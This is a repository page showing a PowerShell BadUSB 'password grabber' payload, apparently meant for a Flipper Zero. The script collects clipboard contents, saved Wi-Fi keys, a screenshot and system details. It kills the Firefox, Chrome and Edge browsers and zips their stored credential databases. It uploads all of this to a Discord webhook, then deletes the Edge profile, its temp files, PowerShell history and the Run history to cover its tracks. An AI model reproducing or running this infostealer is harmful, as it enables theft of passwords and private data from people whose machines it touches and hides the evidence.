aaron/flipper-zero-stuff
aaron/flipper-zero-stuff
1
0
Fork 0
Code Issues Pull requests Actions Packages Projects Releases Wiki Activity
flipper-zero-stuff/badusb/s4dic - BadUSB/passwordgrabber/payload à upload en ligne.ps1
aaron ab68519384 commit muder
2024-08-14 08:38:30 -07:00

167 lines
7.4 KiB
PowerShell
Raw Permalink Blame History

#CHANGE URL TO YOUR URL
$url="https://discord.com/api/webhooks/XXXXXXXXXXXXXXXXXXXX/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" ;
#Get PC Name+Date+Time
$namepc = Get-Date -UFormat "$env:computername-$env:UserName-%m-%d-%Y_%H-%M-%S"
# Get PC ClipBoard
echo "" > "$env:temp\stats-$namepc.txt";
echo "####PC ClipBoard under this line:" >> "$env:temp\stats-$namepc.txt";
echo "####################################" >> "$env:temp\stats-$namepc.txt";
Get-Clipboard >> "$env:temp\stats-$namepc.txt";
echo "####################################" >> "$env:temp\stats-$namepc.txt";
echo "####End ClipBoard" >> "$env:temp\stats-$namepc.txt";
# Get WifiPassword
echo "" > "$env:temp\WIFI-$namepc.txt";
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | out-file "$env:temp\WIFI-$namepc.txt";
# Screenshot
cd "$env:temp";
echo 'function Get-ScreenCapture' > "d.ps1";
echo '{' >> "d.ps1";
echo ' begin {' >> "d.ps1";
echo ' Add-Type -AssemblyName System.Drawing, System.Windows.Forms' >> "d.ps1";
echo ' Add-Type -AssemblyName System.Drawing' >> "d.ps1";
echo ' $jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() |' >> "d.ps1";
echo ' Where-Object { $_.FormatDescription -eq "JPEG" }' >> "d.ps1";
echo ' }' >> "d.ps1";
echo ' process {' >> "d.ps1";
echo ' Start-Sleep -Milliseconds 44' >> "d.ps1";
echo ' [Windows.Forms.Sendkeys]::SendWait("{PrtSc}")' >> "d.ps1";
echo ' Start-Sleep -Milliseconds 550' >> "d.ps1";
echo ' $bitmap = [Windows.Forms.Clipboard]::GetImage()' >> "d.ps1";
echo ' $ep = New-Object Drawing.Imaging.EncoderParameters' >> "d.ps1";
echo ' $ep.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, [long]100)' >> "d.ps1";
echo ' $screenCapturePathBase = $env:temp + "\" + $env:UserName + "_Capture"' >> "d.ps1";
echo ' $bitmap.Save("${screenCapturePathBase}.jpg", $jpegCodec, $ep)' >> "d.ps1";
echo ' }' >> "d.ps1";
echo '}' >> "d.ps1";
echo 'Get-ScreenCapture' >> "d.ps1";
$screencapture = echo $env:temp"\"$env:UserName"_Capture"
powershell -c $env:temp\d.ps1;
$Screencap = "$env:temp\d.ps1";
# Get PC information
dir env: >> "$env:temp\stats-$namepc.txt";
# Get public IP
$pubip = (Invoke-WebRequest -UseBasicParsing -uri "http://ifconfig.me/").Content
echo "PUBLIC IP: $pubip" >> "$env:temp\stats-$namepc.txt";
# Get Local IP
ipconfig /all >> "$env:temp\stats-$namepc.txt";
# List all installed Software
echo "Installed Software:" >> "$env:temp\stats-$namepc.txt";
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize >> "$env:temp\stats-$namepc.txt";
Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize >> "$env:temp\stats-$namepc.txt";
# Get FireFox Password
#firefox ZIP
Add-Type -Assembly "System.IO.Compression.FileSystem" ;
#Kill Firefox
taskkill /IM firefox.exe /F
#search key4.db and logins.json
$key4 = Get-Childitem -Path $env:appdata\Mozilla\Firefox\Profiles\ -Include key4.db -Recurse -ErrorAction SilentlyContinue | % { $_.fullname }
$logins = Get-Childitem -Path $env:appdata\Mozilla\Firefox\Profiles\ -Include logins.json -Recurse -ErrorAction SilentlyContinue | % { $_.fullname }
#Compress firefox files where stored passwords
$compress = @{
Path = "$key4", "$logins"
CompressionLevel = "Fastest"
DestinationPath = "$env:temp\Firefox-Password-$namepc.zip"
}
Compress-Archive @compress -Update
#Define zip to copy
$firefoxpassword = "$env:temp\Firefox-Password-$namepc.zip"
#Get Chrome Password
#Chrome ZIP
Add-Type -Assembly "System.IO.Compression.FileSystem";
#Kill Chrome
taskkill /IM chrome.exe /F
sleep 1
#Compress chrome files where stored passwords
$compress = @{
Path = "$env:appdata\..\local\Google\Chrome\User Data\Local State", "$env:appdata\..\local\Google\Chrome\User Data\default\Login Data", "$env:appdata\..\local\Google\Chrome\User Data\default\Preferences"
CompressionLevel = "Fastest"
DestinationPath = "$env:temp\Chrome-Password-$namepc.zip"
}
Compress-Archive @compress -Update
sleep 1
#Define zip to copy
$chromepassword = "$env:temp\Chrome-Password-$namepc.zip"
#Get Edge Password
#Edge ZIP
Add-Type -Assembly "System.IO.Compression.FileSystem" ;
#Kill Edge
taskkill /IM msedge.exe /F
sleep 1
#Compress Edge files where stored passwords
$compress = @{
Path = "$env:appdata\..\Local\Microsoft\Edge\User Data\Local State", "$env:appdata\..\Local\Microsoft\Edge\User Data\default\Login Data", "$env:appdata\..\Local\Microsoft\Edge\User Data\default\Preferences"
CompressionLevel = "Fastest"
DestinationPath = "$env:temp\Edge-Password-$namepc.zip"
}
Compress-Archive @compress -Update
sleep 1
#Define zip to copy
$edgepassword = "$env:temp\Edge-Password-$namepc.zip"
#UPLOAD
cd $env:temp
# Send Name Computer to discord
$Body=@{ content = "**Stats from Flipper-Zero on user:** $env:UserName, on pc: $env:computername"};
Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);
# Upload Stat
curl.exe -F "file1=@stats-$namepc.txt" $url;
# Upload wifi password
curl.exe -F "file2=@WIFI-$namepc.txt" $url;
# Upload Webbroser Password Pwned
$Body=@{ content = "**Web Browsers Password Pwned**"};
Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);
# Upload firefox password
curl.exe -i -F file=@"$firefoxpassword" $url
# Upload chrome password
curl.exe -i -F file=@"$chromepassword" $url
# Upload Edge password
curl.exe -i -F file=@"$edgepassword" $url
# Upload screenshot
sleep 1
$Body=@{ content = "**Screen Capture before attack start**"};
Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);
curl.exe -F "file2=@$screencapture.jpg" $url;
# Remove Edge clear configuration
# Kill again and agan Edge after flipper zero get the token
taskkill /IM msedge.exe /F
Remove-Item $env:APPDATA\..\Local\Microsoft\Edge -Force -Recurse;
sleep 2
Remove-Item $env:APPDATA\..\Local\Microsoft\Edge -Force -Recurse;
# Restore Edge configuration
mv $env:APPDATA\..\Local\Microsoft\ZZZZZZZ $env:APPDATA\..\Local\Microsoft\Edge
#Delete all file
# Delete stat
Remove-Item "stats-$namepc.txt" -Force -Recurse;
# Delete wifi password
Remove-Item "WIFI-$namepc.txt" -Force -Recurse;
# Delete screenshot
Remove-Item $screencapture* -Force -Recurse;
# Delete token screencapture
Remove-Item $tokencapture* -Force -Recurse;
# Delete firefox password
Remove-Item $firefoxpassword -Force -Recurse;
# Delete Chrome password
Remove-Item $chromepassword -Force -Recurse;
# Delete Edge password
Remove-Item $edgepassword -Force -Recurse;
# Delete this script
Remove-Item $env:temp\e.ps1 -Force -Recurse;
# Delete screencapture script
Remove-Item $env:temp\d.ps1 -Force -Recurse;
# Clear History powershell:
[Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory();
# Clear run powershell:
Remove-Item HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
exit;
Reference in a new issue View git blame Copy permalink